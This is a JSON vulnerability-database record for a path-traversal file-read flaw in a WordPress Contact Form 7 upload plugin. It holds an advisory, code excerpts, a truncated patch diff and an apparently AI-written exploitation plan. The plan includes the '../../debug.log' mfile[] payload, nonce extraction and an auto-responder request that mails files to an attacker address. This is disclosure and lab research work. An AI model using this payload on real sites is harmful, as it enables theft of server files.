[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fB72hZQN1QcKICP85Zg8BwffzVHfZUI1NKir8ijiQpuI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-5710","drag-and-drop-multiple-file-upload-for-contact-form-7-unauthenticated-limited-arbitrary-file-read-via-mfile-field","Drag and Drop Multiple File Upload for Contact Form 7 \u003C= 1.3.9.6 - Unauthenticated Limited Arbitrary File Read via mfile Field","The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to Path Traversal leading to Arbitrary File Read in versions up to and including 1.3.9.6. This is due to the plugin using client-supplied mfile[] POST values as the source of truth for email attachment selection without performing any server-side upload provenance check, path canonicalization, or directory containment boundary enforcement. In dnd_wpcf7_posted_data(), each user-submitted filename is directly appended to the plugin's upload URL without sanitization. 
In dnd_cf7_mail_components(), the URL is converted back to a filesystem path using str_replace() and only file_exists() is used as the acceptance check before attaching the file to the outgoing CF7 email. This makes it possible for unauthenticated attackers to read and exfiltrate arbitrary files readable by the web server process via path traversal sequences in the mfile[] parameter, with files being disclosed as email attachments. Note: This vulnerability is limited to the 'wp-content' folder due to the wpcf7_is_file_path_in_content_dir() function in the Contact Form 7 plugin.","drag-and-drop-multiple-file-upload-contact-form-7",null,"\u003C=1.3.9.6","1.3.9.7","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-17 04:37:14","2026-04-17 17:25:54",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1005eb8c-da5a-4422-9d65-0f341ad755b2?source=api-prod",1,[22,23,24,25,26,27,28],"assets\u002Fjs\u002Fcodedropz-uploader-jquery.js","assets\u002Fjs\u002Fcodedropz-uploader-min.js","assets\u002Fjs\u002Fdev\u002Fjquery-dev.js","assets\u002Fjs\u002Fdev\u002Fnative-dev.js","drag-n-drop-upload-cf7.php","inc\u002Fdnd-upload-cf7.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-5710\n\n## 1. Vulnerability Summary\nThe **Drag and Drop Multiple File Upload for Contact Form 7** plugin (up to version 1.3.9.6) is vulnerable to an unauthenticated arbitrary file read vulnerability via path traversal. \n\nThe vulnerability exists because the plugin trusts client-supplied values in the `mfile[]` POST parameters. During form submission, the plugin appends these values to its upload directory URL in `dnd_wpcf7_posted_data()`. 
Subsequently, in `dnd_cf7_mail_components()`, it converts these URLs back into absolute filesystem paths using simple string replacement and attaches them to the outgoing Contact Form 7 email. Because there is no check to ensure the file was actually uploaded by the plugin or stays within the intended directory, an attacker can use `..\u002F` sequences to traverse the filesystem and attach any file readable by the web server (limited to the `wp-content` directory by Contact Form 7's own security boundaries) to the email.\n\n## 2. Attack Vector Analysis\n- **Target Endpoint**: Contact Form 7's AJAX or REST API submission endpoint.\n    - REST: `\u002Fwp-json\u002Fcontact-form-7\u002Fv1\u002Fcontact-forms\u002F\u003CID>\u002Ffeedback`\n    - AJAX: `\u002Fwp-admin\u002Fadmin-ajax.php?action=wpcf7_submit`\n- **Vulnerable Parameter**: The name of the `mfile` field defined in the form (e.g., `upload-file-1[]`).\n- **Authentication**: None required (Unauthenticated).\n- **Preconditions**: \n    - A Contact Form 7 form must exist that uses the `[mfile]` tag.\n    - The form should ideally have \"Mail (2)\" (auto-responder) enabled and configured to include the `mfile` field as an attachment, allowing the attacker to receive the file at an email address they control.\n\n## 3. Code Flow\n1. **Entry**: A user submits a CF7 form containing an `mfile` field.\n2. **Hook**: `inc\u002Fdnd-upload-cf7.php` registers `add_filter('wpcf7_posted_data', 'dnd_wpcf7_posted_data', 10, 1);`.\n3. **Processing**: `dnd_wpcf7_posted_data()` is called.\n    - It iterates through form tags.\n    - When it finds `basetype == 'mfile'`, it takes the POST data: \n      `$posted_data[$field_name][$key] = trailingslashit( $uploads_dir['upload_url'] ) . $file;`\n    - Here, `$file` is the attacker-supplied traversal string (e.g., `..\u002F..\u002F..\u002Fdebug.log`).\n4. 
**Sink**: `dnd_cf7_mail_components()` (hooked to `wpcf7_mail_components`) processes the mail components before sending.\n    - It retrieves the pseudo-URL from the submission data.\n    - It converts the URL to a path (e.g., by replacing `site_url()` with `ABSPATH`).\n    - It checks `if (file_exists($file_path))` and, if true, appends `$file_path` to `$components['attachments']`.\n5. **Exfiltration**: Contact Form 7 sends the email with the sensitive file attached to the recipient(s).\n\n## 4. Nonce Acquisition Strategy\nTo submit a Contact Form 7 form, a `_wpcf7_nonce` is typically required.\n\n1. **Identify Form**: Find a page containing a CF7 form with an `[mfile]` tag. If none exists, create one (see Test Data Setup).\n2. **Navigate**: Use `browser_navigate` to the page URL.\n3. **Extract CF7 Nonce**:\n   ```javascript\n   \u002F\u002F Execute via browser_eval\n   document.querySelector('input[name=\"_wpcf7_nonce\"]').value\n   ```\n4. **Extract Plugin AJAX Nonce** (if needed for supplementary actions):\n   - The plugin localizes its nonce in the `dnd_cf7_uploader` object.\n   ```javascript\n   \u002F\u002F Execute via browser_eval\n   window.dnd_cf7_uploader?.ajax_nonce\n   ```\n\n## 5. Exploitation Strategy\nThis exploit involves submitting a form with a malicious payload in the `mfile` field.\n\n1. **Step 1: Discover Form Details**\n   Identify the form ID (`_wpcf7`), the field name for the `mfile` tag, and the `_wpcf7_unit_tag`.\n\n2. **Step 2: Construct Payload**\n   - Target File: `wp-content\u002Fdebug.log` (common) or `wp-content\u002Fplugins\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Fdrag-n-drop-upload-cf7.php`.\n   - Traversal: Since the base directory is `wp-content\u002Fuploads\u002Fwp_dndcf7_uploads\u002F`, the relative path to `wp-content\u002F` is `..\u002F..\u002F`.\n   - Final Payload for `mfile` parameter: `..\u002F..\u002Fdebug.log`.\n\n3. 
**Step 3: Execute Attack (HTTP Request)**\n   Send a POST request to the CF7 REST API.\n   - **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fcontact-form-7\u002Fv1\u002Fcontact-forms\u002F\u003CID>\u002Ffeedback`\n   - **Method**: `POST`\n   - **Content-Type**: `multipart\u002Fform-data`\n   - **Body Parameters**:\n     - `_wpcf7`: `\u003CID>`\n     - `_wpcf7_version`: (Current CF7 version)\n     - `_wpcf7_locale`: `en_US`\n     - `_wpcf7_unit_tag`: `\u003CTAG>`\n     - `_wpcf7_nonce`: `\u003CNONCE>`\n     - `your-email`: `attacker@example.com` (Target for auto-responder)\n     - `\u003CFIELD_NAME>[]`: `..\u002F..\u002Fdebug.log` (The traversal payload)\n\n## 6. Test Data Setup\nPrepare the environment using WP-CLI:\n\n1. **Install Plugins**:\n   ```bash\n   wp plugin install contact-form-7 --activate\n   wp plugin install drag-and-drop-multiple-file-upload-contact-form-7 --version=1.3.9.6 --activate\n   ```\n\n2. **Create a Canary File**:\n   ```bash\n   echo \"CONFIDENTIAL_DATA_LEAKED\" > \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fsecret-leak.txt\n   ```\n\n3. **Create Vulnerable Form**:\n   Create a CF7 form that includes an `mfile` field and sends an auto-responder (Mail 2) to the user.\n   ```bash\n   # Use wp eval to create the form programmatically\n   wp eval '\n   $cf = wpcf7_contact_form::get_template();\n   $cf->set_title(\"Vulnerable Form\");\n   $cf->set_properties([\n       \"form\" => \"[text* your-name][email* your-email][mfile leak-field][submit \\\"Send\\\"]\",\n       \"mail_2\" => [\n           \"active\" => true,\n           \"recipient\" => \"[your-email]\",\n           \"sender\" => \"admin@example.com\",\n           \"subject\" => \"Your Files\",\n           \"body\" => \"See attached.\",\n           \"attachments\" => \"[leak-field]\"\n       ]\n   ]);\n   $cf->save();\n   echo \"Form ID: \" . $cf->id();\n   '\n   ```\n\n4. 
**Publish Page with Form**:\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_title=\"Contact\" --post_content='[contact-form-7 id=\"\u003CFORM_ID>\"]'\n   ```\n\n## 7. Expected Results\n- The HTTP response from the CF7 endpoint should return `{\"status\":\"mail_sent\", \"message\":\"...\"}`.\n- Internally, the `$components['attachments']` array in the mailer will contain the resolved path: `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fsecret-leak.txt`.\n- In a real-world scenario, the attacker would receive an email at `attacker@example.com` with the file attached.\n\n## 8. Verification Steps\nSince actual email delivery might not be visible in the test container:\n1. **Check Mail Log**: If a mail logging plugin is installed, check for the sent attachment.\n2. **Mock Filter Test**: Use WP-CLI to verify that the plugin logic correctly resolves the traversal:\n   ```bash\n   wp eval '\n   $field_name = \"leak-field\";\n   $payload = \"..\u002F..\u002Fsecret-leak.txt\";\n   $uploads = dnd_get_upload_dir();\n   $pseudo_url = trailingslashit($uploads[\"upload_url\"]) . $payload;\n   \n   \u002F\u002F Simulate dnd_cf7_mail_components logic\n   $file_path = str_replace(site_url() . \"\u002F\", wp_normalize_path(ABSPATH), $pseudo_url);\n   echo \"Resolved Path: \" . $file_path . \"\\n\";\n   echo \"File Exists: \" . (file_exists($file_path) ? \"YES\" : \"NO\") . \"\\n\";\n   '\n   ```\n\n## 9. 
Alternative Approaches\nIf the REST API is disabled or restricted:\n- Use the AJAX entry point: `POST \u002Fwp-admin\u002Fadmin-ajax.php` with `action=wpcf7_submit`.\n- Ensure all standard CF7 hidden fields are included (`_wpcf7_container_post`, etc.).\n- If `wp-config.php` is restricted by `wpcf7_is_file_path_in_content_dir()`, target `wp-content\u002Fdebug.log` or a theme's `style.css` to confirm read access.","The Drag and Drop Multiple File Upload for Contact Form 7 plugin is vulnerable to unauthenticated arbitrary file read via path traversal in versions up to 1.3.9.6. The plugin trusts client-supplied filenames in the mfile[] POST parameter to resolve email attachment paths without performing server-side provenance checks or directory containment validation. This allows attackers to exfiltrate sensitive files within the wp-content directory by having them attached to outgoing Contact Form 7 emails.","\u002F\u002F inc\u002Fdnd-upload-cf7.php line 271\nif( $field->basetype == 'mfile' && isset( $posted_data[$field_name] ) && ! empty( $posted_data[$field_name] ) ) {\n    if ( is_array( $posted_data ) ) {\n        foreach( $posted_data[$field_name] as $key => $file ) {\n            $posted_data[$field_name][$key] = trailingslashit( $uploads_dir['upload_url'] ) . $file;\n        }\n    }\n}\n\n---\n\n\u002F\u002F inc\u002Fdnd-upload-cf7.php line 211 (Mirroring the conversion logic used in the mailer sink)\n\u002F\u002F Convert url to dir\n$file = str_replace( site_url() . 
'\u002F', wp_normalize_path( ABSPATH ), $file_url );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002F1.3.9.6\u002Fassets\u002Fjs\u002Fcodedropz-uploader-jquery.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002F1.3.9.7\u002Fassets\u002Fjs\u002Fcodedropz-uploader-jquery.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002F1.3.9.6\u002Fassets\u002Fjs\u002Fcodedropz-uploader-jquery.js\t2026-03-05 05:19:50.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002F1.3.9.7\u002Fassets\u002Fjs\u002Fcodedropz-uploader-jquery.js\t2026-04-17 04:16:40.000000000 +0000\n@@ -2,14 +2,60 @@\n  * CodeDropz Uploader\n  * Copyright 2018 Glen Mongaya\n  * CodeDrop Drag&Drop Uploader\n- * @version 1.3.9.6\n+ * @version 1.3.9.7\n  * @author CodeDropz, Glen Don L. Mongaya\n  * @license The MIT License (MIT)\n  *\u002F\n \n+\u002F\u002F New: Native helper - find elements within a context (replaces $(selector, ctx))\n+function _find( ctx, selector ) {\n+\tif ( ! ctx ) return [];\n+\tif ( typeof ctx === 'string' ) ctx = document.querySelector( ctx );\n+\treturn Array.from( ( ctx || document ).querySelectorAll( selector ) );\n+}\n+\n+\u002F\u002F New: Native helper - get a single element\n+function _findOne( ctx, selector ) {\n+\tif ( ! 
ctx ) return null;\n+\tif ( typeof ctx === 'string' ) ctx = document.querySelector( ctx );\n+\treturn ( ctx || document ).querySelector( selector );\n+}\n+\n+\u002F\u002F New: Native helper - add class to element\n+function _addClass( el, cls ) {\n+\tif ( el && cls ) el.classList.add( cls );\n+}\n+\n+\u002F\u002F New: Native helper - remove class from element\n+function _removeClass( el, cls ) {\n+\tif ( el && cls ) el.classList.remove( cls );\n+}\n+\n+\u002F\u002F New: Native helper - check if element has class\n+function _hasClass( el, cls ) {\n+\treturn el ? el.classList.contains( cls ) : false;\n+}\n+\n+\u002F\u002F New: Native helper – safely append HTML after an element\n+function _insertAfter( referenceEl, html ) {\n+\tif ( ! referenceEl || ! html ) return null;\n+\tvar template = document.createElement( 'div' );\n+\ttemplate.innerHTML = html;\n+\tvar node = template.firstChild;\n+\treferenceEl.parentNode.insertBefore( node, referenceEl.nextSibling );\n+\treturn node;\n+}\n+\n+\u002F\u002F New: Native helper – safely escape HTML to prevent XSS in file names\n+function _escapeHtml( str ) {\n+\tvar div = document.createElement( 'div' );\n+\tdiv.appendChild( document.createTextNode( String( str ) ) );\n+\treturn div.innerHTML;\n+}","The exploit is performed by submitting a Contact Form 7 form that includes an mfile upload tag. An unauthenticated attacker first obtains a valid CF7 submission nonce and the form's unit tag from the target page. They then send a POST request to either the CF7 AJAX endpoint or the REST API endpoint (\u002Fwp-json\u002Fcontact-form-7\u002Fv1\u002Fcontact-forms\u002F\u003CID>\u002Ffeedback). The payload consists of adding a path traversal sequence to the field name corresponding to the mfile tag (e.g., upload-file-1[]: ..\u002F..\u002Fdebug.log). Because the plugin trusts this value as the file name to be retrieved from its upload directory, it resolves the traversal to an absolute path on the server (limited to wp-content). 
If the form is configured with an auto-responder (Mail 2) that includes the mfile tag, the plugin will attach the requested sensitive file to the email and send it to the address provided by the attacker in the submission.","gemini-3-flash-preview","2026-04-20 20:13:52","2026-04-20 20:14:33",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.3.9.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags\u002F1.3.9.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdrag-and-drop-multiple-file-upload-contact-form-7.1.3.9.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags\u002F1.3.9.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdrag-and-drop-multiple-file-upload-contact-form-7.1.3.9.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags"]
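Review bot: the diff shown covers only assets/js/codedropz-uploader-jquery.js (a version bump from 1.3.9.6 to 1.3.9.7 plus new native DOM helpers such as _find, _addClass, _insertAfter and _escapeHtml), so it does not show the server-side fix for the path traversal this record describes; patch_diff_files also lists inc/dnd-upload-cf7.php and drag-n-drop-upload-cf7.php, and the hunks for those files, where dnd_wpcf7_posted_data() and dnd_cf7_mail_components() live, are the ones a reviewer needs to see to confirm that upload provenance, path canonicalization and directory containment are now enforced before a path reaches $components['attachments']. The hunk header `@@ -2,14 +2,60 @@` promises 60 post-image lines, but the shown hunk ends right after _escapeHtml, so the diff as stored is truncated. Minor, in _insertAfter: `var node = template.firstChild;` yields a text node when the HTML string starts with whitespace; `template.firstElementChild` would be the safer choice.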